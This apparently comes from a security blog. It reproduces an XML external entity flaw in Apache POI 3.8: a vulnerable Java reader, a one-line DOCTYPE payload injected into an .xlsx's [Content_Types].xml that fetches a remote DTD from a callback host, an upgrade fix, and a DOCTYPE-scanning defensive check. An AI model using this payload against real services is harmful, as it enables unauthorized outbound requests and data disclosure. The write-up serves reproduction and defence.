Reproducing the org.apache.poi 3.8 Excel XXE vulnerability
Reproduction steps
Add the dependencies to pom.xml:
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi</artifactId>
<version>3.8</version>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>3.8</version>
</dependency>
Key code:
import java.io.FileInputStream;
import java.io.IOException;
import org.apache.poi.xssf.usermodel.XSSFRow;
import org.apache.poi.xssf.usermodel.XSSFSheet;
import org.apache.poi.xssf.usermodel.XSSFWorkbook;

public String readExcelData(String path, String sheetName) throws IOException {
    FileInputStream fileInputStream = new FileInputStream(path);
    // opening the workbook parses every XML part of the package, including [Content_Types].xml
    XSSFWorkbook sheets = new XSSFWorkbook(fileInputStream);
    // get the sheet
    XSSFSheet sheet = sheets.getSheet(sheetName);
    // get the number of rows
    int rows = sheet.getPhysicalNumberOfRows();
    StringBuilder cell = new StringBuilder();
    for (int i = 0; i < rows; i++) {
        // get the number of columns
        XSSFRow row = sheet.getRow(i);
        int columns = row.getPhysicalNumberOfCells();
        for (int j = 0; j < columns; j++) {
            cell.append(row.getCell(j).toString()).append("</br>");
        }
    }
    return cell.toString();
}
Unzip xxe.xlsx, open [Content_Types].xml and insert the following as its second line:
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://dnslog/test.dtd"> ]> <x>&xxe;</x>
Once the file is read, the DNS log callback is triggered.
Fix:
Upgrade POI to version 4.0.1 or later.
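As an added defence-in-depth example (not code from the original post), the check below scans every XML part of an .xlsx package for a DOCTYPE declaration, which is the only place the entity used above can be declared, so a caller can reject the file before handing it to XSSFWorkbook; the class name OoxmlDtdCheck and the in-memory constructed package are assumptions.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.regex.Pattern;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public class OoxmlDtdCheck {
    // Entities can only be declared inside a DOCTYPE, so a DOCTYPE in any part is grounds to reject the file
    private static final Pattern DOCTYPE = Pattern.compile("<!DOCTYPE", Pattern.CASE_INSENSITIVE);

    /** Returns the name of the first XML part containing a DOCTYPE declaration, or null if there is none. */
    public static String findDoctypePart(InputStream packageStream) throws IOException {
        try (ZipInputStream zip = new ZipInputStream(packageStream)) {
            ZipEntry entry;
            while ((entry = zip.getNextEntry()) != null) {
                String name = entry.getName();
                if (entry.isDirectory() || !(name.endsWith(".xml") || name.endsWith(".rels"))) {
                    continue;
                }
                // readAllBytes on a ZipInputStream stops at the end of the current entry
                String xml = new String(zip.readAllBytes(), StandardCharsets.UTF_8);
                if (DOCTYPE.matcher(xml).find()) {
                    return name;
                }
            }
        }
        return null;
    }

    /** Constructed test package (assumption): a zip holding only [Content_Types].xml, not a real workbook. */
    static byte[] constructedPackage(String contentTypesXml) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        try (ZipOutputStream zip = new ZipOutputStream(out)) {
            zip.putNextEntry(new ZipEntry("[Content_Types].xml"));
            zip.write(contentTypesXml.getBytes(StandardCharsets.UTF_8));
            zip.closeEntry();
        }
        return out.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        String clean = "<?xml version=\"1.0\"?><Types/>";
        String withDtd = "<?xml version=\"1.0\"?>\n<!DOCTYPE x [ <!ENTITY e \"test\"> ]><Types/>";
        System.out.println("clean -> " + findDoctypePart(new ByteArrayInputStream(constructedPackage(clean))));
        System.out.println("dtd   -> " + findDoctypePart(new ByteArrayInputStream(constructedPackage(withDtd))));
    }
}
```

Call findDoctypePart on the upload before readExcelData and refuse the file when it returns a part name; the check assumes UTF-8 parts, which is what Excel writes, so a UTF-16 part would need decoding by its BOM first.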